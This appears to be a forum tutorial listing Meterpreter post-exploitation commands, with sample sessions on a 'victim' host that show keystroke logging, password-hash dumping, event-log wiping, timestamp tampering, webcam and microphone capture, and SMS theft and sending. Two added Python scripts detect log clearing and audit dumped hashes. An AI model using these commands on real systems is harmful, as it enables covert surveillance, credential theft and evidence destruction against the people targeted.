Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool.
Throughout this thread, almost every available Meterpreter command is covered. For those that aren’t covered, experimentation is the key to successful learning. And you are free to ask for help with them.
List of commands covered:

Core commands: ?, background, bgkill, bgrun, bglist, channel, close, exit, exploit, help, interact, irb, migrate, quit, read, run, resource, use, write
File System commands: cat, cd, del, download, edit, getlwd, getwd, lcd, lpwd, ls, mkdir, pwd, rm, rmdir, upload, search
Networking Commands: ifconfig, portfwd, route
System Commands: clearev, drop_token, execute, getpid, getprivs, getuid, kill, ps, reboot, reg, rev2self, shell, shutdown, steal_token, sys_info
User Interface: enumdesktops, getdesktop, idletime, keyscan_start, keyscan_dump, keyscan_stop, screenshot, set_desktop, uictl
Password hash: hashdump
Timestomp commands: timestomp
Privilege Escalation: getsystem
Other Useful commands: webcam_list, webcam_snap, webcam_stream, record_mic, activity_start, check_root, geolocate, wlan_geolocate, dump_calllog, dump_contacts, dump_sms, send_sms
Note : bookmark this page as it is possibly the most complete cheat sheet of meterpreter commands found anywhere on the web, so you’ll want it to refer back to this sheet often.
Core commands
?
The ? command, as may be expected, displays the Meterpreter help menu.
meterpreter > ?

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    channel       Displays information about active channels
...snip...
background
The background command will send the current Meterpreter session to the background and return you to the ‘msf’ prompt. To get back to your Meterpreter session, just interact with it again.
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
bgkill
The bgkill command kills a background Meterpreter script.
bgrun
The bgrun command runs a script as a background thread.
bglist
The bglist command lists all running background scripts.
channel
The channel command displays all active channels.
close
The close command closes a channel.
exit
The exit command terminates the Meterpreter session.
exploit
The exploit command executes the Meterpreter script designated after it.
help
The help command, as may be expected, displays the Meterpreter help menu, the same as the ? command.
interact
The interact command interacts with a channel.
irb
The irb command switches into Ruby scripting mode.

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>>
migrate
Using the migrate post module, you can migrate to another process on the victim.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
quit
The quit command terminates the Meterpreter session.
read
The read command reads data from a channel.
run
The run command executes the Meterpreter script designated after it.
resource
The resource command executes Meterpreter commands loaded from a text file. The file contains one command per line, and resource executes each line in sequence. This can help automate repetitive actions. By default, the commands run in the current working directory on the target machine, and the resource file is read from the local working directory on the attacking machine.

meterpreter > resource
Usage: resource path1 path2
Run the commands stored in the supplied files.
use
The use command loads a Meterpreter extension.
write
The write command writes data to a channel.
File system commands
cat
The cat command is identical to the command found on *nix systems. It displays the content of a file when it’s given as an argument.
meterpreter > cat edit.txt
What you talkin' about Willis
cd
The change directory “cd” works the same way as it does under DOS and *nix systems.
meterpreter > cd c:\windows
meterpreter > pwd
c:\windows
del
The del command deletes a file on the victim.
download
The download command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. The -r option allows you to do so recursively.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
edit
The edit command opens a file located on the target host. It uses vim, so all of that editor’s commands are available.
meterpreter > edit edit.txt
getlwd
The getlwd command prints the local working directory.
lcd
The lcd command changes the local working directory. Changing the local working directory gives your Meterpreter session access to files located in that folder.

meterpreter > lcd /var/www
meterpreter > lpwd
/var/www
lpwd
The lpwd command displays the local working directory. When receiving a Meterpreter shell, the local working directory is the location where you started the Metasploit console.

meterpreter > lpwd
/root
ls
As in Linux, the ls command will list the files in the current remote directory.
meterpreter > ls

Listing: C:\Documents and Settings\victim
=========================================

Mode              Size  Type  Last modified                   Name
----              ----  ----  -------------                   ----
40777/rwxrwxrwx   0     dir   Sat Oct 17 07:40:45 -0600 2009  .
40777/rwxrwxrwx   0     dir   Fri Jun 19 13:30:00 -0600 2009  ..
100666/rw-rw-rw-  218   fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
40555/r-xr-xr-x   0     dir   Wed Nov 04 19:44:05 -0700 2009  Application Data
...snip...
mkdir
The mkdir command makes a directory on the victim’s system.
pwd
The pwd command displays the current working directory on the target host. By default, the current working folder is where the connection to your listener was initiated.
rm
The rm command, as on *nix systems, deletes (removes) a file.
rmdir
The rmdir command, as on *nix systems, deletes (removes) a directory.
upload
As with the download command, you need to use double-slashes in Windows paths with the upload command. It uploads a file to the target system. The -r option allows you to do so recursively.
search
The search command provides a way of locating specific files on the target host. The command is capable of searching through the whole system or specific folders. Wildcards can also be used when creating the file pattern to search for.

meterpreter > search -f sea*.bat c:\\xamp\\
Found 1 result...
    c:\\xampp\perl\bin\search.bat (57035 bytes)
Networking Commands
ifconfig, ipconfig
The ifconfig or ipconfig command displays the network interfaces and addresses on the remote machine.
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address  : 192.168.1.104
Netmask     : 255.255.0.0
portfwd
The portfwd command forwards a port on the victim system to a remote service.
route
The route command views or modifies the victim’s routing table.
System Commands
clearev
The clearev command will clear the Application, System, and Security logs on a Windows system. There are no options or arguments.
meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
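Wiping the three logs is itself recorded: Windows writes Event ID 1102 ("The audit log was cleared") into the Security log and Event ID 104 into the System log when any other log is cleared, both from the Microsoft-Windows-Eventlog provider. The following is an added example, not code from the original post or from Metasploit, showing detection logic a defender would run over exported event records to spot a burst of log clears like the one above. The pipe-separated record layout and the log lines are constructed for the example; the event IDs are well-known Windows values.

```python
import re
from datetime import datetime, timedelta

# Event IDs that Windows records when a log is cleared (well-known values, not from the page):
#   1102 in the Security log  -> the audit log was cleared
#   104  in the System log    -> another log (Application, System, ...) was cleared
CLEAR_EVENT_IDS = {1102, 104}
LOG_NAME_RE = re.compile(r"The (\w+) log file was cleared")
ACTOR_RE = re.compile(r"(?:User|Account Name): (\S+)")

# Constructed sample export, one record per line: timestamp|Log|EventID|Provider|Message
SAMPLE_LOG = """\
2024-05-01T10:14:02|System|7036|Service Control Manager|The Print Spooler service entered the running state.
2024-05-01T10:15:30|Security|4624|Microsoft-Windows-Security-Auditing|An account was successfully logged on. Account Name: jdoe
2024-05-01T10:16:11|System|104|Microsoft-Windows-Eventlog|The Application log file was cleared. User: VICTIM\\jdoe
2024-05-01T10:16:11|System|104|Microsoft-Windows-Eventlog|The System log file was cleared. User: VICTIM\\jdoe
2024-05-01T10:16:12|Security|1102|Microsoft-Windows-Eventlog|The audit log was cleared. Account Name: jdoe
2024-05-01T11:40:00|Security|4634|Microsoft-Windows-Security-Auditing|An account was logged off.
"""


def parse_record(line):
    """Split one exported record into its fields; returns None for malformed lines."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    ts, log, event_id, provider, message = parts
    return {
        "time": datetime.fromisoformat(ts),
        "log": log,
        "event_id": int(event_id),
        "provider": provider,
        "message": message,
    }


def find_log_clears(lines):
    """Return one finding per log-clear event: when, which log was cleared, and by whom."""
    clears = []
    for line in lines:
        rec = parse_record(line)
        if rec is None or rec["event_id"] not in CLEAR_EVENT_IDS:
            continue
        if rec["event_id"] == 1102:
            cleared = "Security"          # 1102 only ever refers to the Security log
        else:
            m = LOG_NAME_RE.search(rec["message"])
            cleared = m.group(1) if m else "unknown"
        actor = ACTOR_RE.search(rec["message"])
        clears.append({
            "time": rec["time"],
            "cleared": cleared,
            "actor": actor.group(1) if actor else "unknown",
        })
    return clears


def group_bursts(clears, window=timedelta(minutes=5)):
    """Group clears that happen within `window` of each other: several logs wiped at once
    (as clearev does) is a stronger signal than a single administrative clear."""
    bursts = []
    for c in sorted(clears, key=lambda c: c["time"]):
        if bursts and c["time"] - bursts[-1][-1]["time"] <= window:
            bursts[-1].append(c)
        else:
            bursts.append([c])
    return bursts


if __name__ == "__main__":
    for burst in group_bursts(find_log_clears(SAMPLE_LOG.splitlines())):
        logs = ", ".join(c["cleared"] for c in burst)
        print(f"{burst[0]['time']}: {len(burst)} log(s) cleared ({logs}) by {burst[0]['actor']}")
```

Because the 104 and 1102 records are written after the clear completes, they survive the wipe; forwarding logs to a central collector means the records that were wiped also survive.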
drop_token
The drop_token command drops a stolen token.
execute
The execute command runs a command on the target.
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
getpid
The getpid command gets the current process ID (PID).
getprivs
The getprivs command enables as many privileges as possible for the current process.

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
  SeTcbPrivilege
  SeAssignPrimaryTokenPrivilege
  ....
getuid
The getuid command gets the user that the server is running as.
kill
The kill command terminates a process on the target, given its PID.
ps
The ps command displays a list of running processes on the target.
meterpreter > ps

Process list
============

    PID   Name            Path
    ---   ----            ----
    132   VMwareUser.exe  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
    152   VMwareTray.exe  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    288   snmp.exe        C:\WINDOWS\System32\snmp.exe
...snip...
reboot
The reboot command reboots the victim computer.
reg
The reg command interacts with the victim’s registry.
rev2self
The rev2self command calls RevertToSelf() on the victim machine.
shell
The shell command will present you with a standard shell on the target system.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
shutdown
The shutdown command shuts down the victim’s computer.
steal_token
The steal_token command attempts to steal the token of the process with the specified PID.
sys_info
The sys_info command gets details about the victim computer, such as the OS and computer name.
User Interface Commands
enumdesktops
The enumdesktops command lists all accessible desktops.

meterpreter > enumdesktops
Enumerating all accessible desktops

Desktops
========

    Session  Station   Name
    -------  -------   ----
    0        WinSta0   Default
    0        WinSta0   Disconnect
    0        WinSta0   Winlogon
    0        SAWinSta  SADesktop
getdesktop
The getdesktop command gets the current Meterpreter desktop.
idletime
The idletime command checks how long the victim system has been idle or inactive.

meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
keyscan_start
The keyscan_start command starts the software keylogger, capturing keystrokes for the process Meterpreter is associated with, such as Word or a browser.

meterpreter > keyscan_start
Starting the keystroke sniffer...
keyscan_dump
The keyscan_dump command dumps the keystrokes captured by the software keylogger so far.

meterpreter > keyscan_dump
Dumping captured keystrokes...
tgoogle.cm my credit amex myusernamthi amexpasswordpassword
keyscan_stop
The keyscan_stop command stops the software keylogger.
screenshot
The screenshot command grabs a screenshot of the Meterpreter desktop.
set_desktop
The set_desktop command changes the Meterpreter desktop.
uictl
The uictl command enables control of some of the user interface components.
Privilege Escalation Commands
getsystem
The getsystem command uses 15 built-in methods to gain sysadmin privileges.
Password hash Commands
hashdump
The hashdump post module will dump the contents of the SAM database.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
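Each line of that output is in pwdump format (user:RID:LM hash:NT hash:::), and the same lines tell a defender a lot about password hygiene on the host. The following is an added example, not code from the original post or from Metasploit, that parses such lines and flags the weaknesses an auditor would act on: blank passwords, LM hashes still being stored (a legacy format that should be disabled by policy), LM hashes whose second half is the empty-half constant (which means the password is 7 characters or fewer), and NT hashes shared between accounts (password reuse). The empty-hash constants are well-known values rather than anything specific to this page; the sample input is the hashdump output shown above.

```python
import re
from collections import Counter

# Well-known hashes of the empty password (facts, not values specific to this page).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_LM_HALF = "aad3b435b51404ee"  # LM hashes 7-character halves; an empty half hashes to this
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump line layout as produced by hashdump: user:RID:LM:NT:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$"
)

# Sample input: the hashdump output quoted in the post above.
SAMPLE_HASHDUMP = """\
[*] Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
""".splitlines()


def parse_pwdump_line(line):
    """Return the fields of one pwdump line, or None for status lines such as '[*] ...'."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        return None
    return {
        "user": m.group("user"),
        "rid": int(m.group("rid")),
        "lm": m.group("lm").lower(),
        "nt": m.group("nt").lower(),
    }


def audit_hashes(lines):
    """Map each account name to the list of weaknesses found in its stored hashes."""
    records = [r for r in (parse_pwdump_line(l) for l in lines) if r]
    nt_counts = Counter(r["nt"] for r in records)  # for spotting shared passwords
    findings = {}
    for r in records:
        issues = []
        if r["nt"] == EMPTY_NT:
            issues.append("blank password")
        if r["lm"] != EMPTY_LM:
            # An LM hash is present: LM storage has not been disabled on this host.
            issues.append("LM hash stored (weak legacy hash)")
            if r["lm"][16:] == EMPTY_LM_HALF:
                issues.append("password is 7 characters or fewer")
        if r["nt"] != EMPTY_NT and nt_counts[r["nt"]] > 1:
            issues.append("same password as another account")
        findings[r["user"]] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit_hashes(SAMPLE_HASHDUMP).items():
        print(f"{user}: {', '.join(issues) if issues else 'no findings'}")
```

On the sample, Guest comes back with a blank password, Administrator and HelpAssistant with LM hashes stored, and dook and victim with LM hashes that reveal passwords of at most 7 characters; SUPPORT_388945a0 has no findings. The mitigations are the usual ones: disable LM hash storage via the NoLMHash policy, enforce length requirements, and disable or lock unused built-in accounts.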
Timestomp commands
timestomp
The timestomp command manipulates the modify, access, create, and MFT-entry-modified (MACE) attributes of a file.

meterpreter > timestomp -h

Usage: timestomp OPTIONS file_path

OPTIONS:

    -a   Set the "last accessed" time of the file
    -b   Set the MACE timestamps so that EnCase shows blanks
    -c   Set the "creation" time of the file
    -e   Set the "mft entry modified" time of the file
    -f   Set the MACE of attributes equal to the supplied file
    -h   Help banner
    -m   Set the "last written" time of the file
    -r   Set the MACE timestamps recursively on a directory
    -v   Display the UTC MACE values of the file
    -z   Set all four attributes (MACE) of the file
Some other useful commands
webcam_list
The webcam_list command lists all available webcams on the target machine.

meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)
webcam_snap
The webcam_snap command takes a picture through the webcam.

meterpreter > webcam_snap -h
Usage: webcam_snap [options]
Grab a frame from the specified webcam.

OPTIONS:

    -h   Help Banner
    -i   The index of the webcam to use (Default: 1)
    -p   The JPEG image path (Default: 'gnFjTnzi.jpeg')
    -q   The JPEG image quality (Default: '50')
    -v   Automatically view the JPEG image (Default: 'true')
webcam_stream
The webcam_stream command streams live video from the target’s webcam.
record_mic
The record_mic command records audio from the target’s microphone.

meterpreter > record_mic -d 20
[*] Starting...
[*] Stopped
Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav
activity_start
The activity_start command starts an Android activity from a URI string.
check_root
The check_root command checks whether the target device is rooted.

meterpreter > check_root
[*] Device is not rooted
geolocate
The geolocate command locates the phone by retrieving its current latitude and longitude using geolocation.
wlan_geolocate
The wlan_geolocate command locates the phone by retrieving its current latitude and longitude from WLAN information.

meterpreter > wlan_geolocate
[*] Google indicates the device is within 150 meters of 30.*******,-97.*******.
[*] Google Maps URL: https://maps.google.com/?q=30.*******,-97.*******
dump_calllog
The dump_calllog command retrieves the call log from the Android device.

meterpreter > dump_calllog
[*] Fetching 500 entries
[*] Contacts list saved to: calllog_dump_20160374745744.txt
dump_contacts
The dump_contacts command retrieves contacts from the target device.

meterpreter > dump_contacts
[*] Fetching 5 contacts into list
[*] Contacts list saved to: contacts_dump_20160308155744.txt
dump_sms, sms_dump
The dump_sms or sms_dump command retrieves SMS messages from the Android device.
send_sms
The send_sms command sends an SMS from the target device.

meterpreter > send_sms -d 9678****** -t hacked
[*] SMS send - Transmission succesfull
Stay Tuned for More Meterpreter Tips…😃
Feedback!
Sorry if this tutorial seemed a bit mundane, but the information contained is still valuable! Don’t forget to voice your comments, questions, or concerns, I’m positive that they’ll all be addressed in some form.
Thanks for reading 😃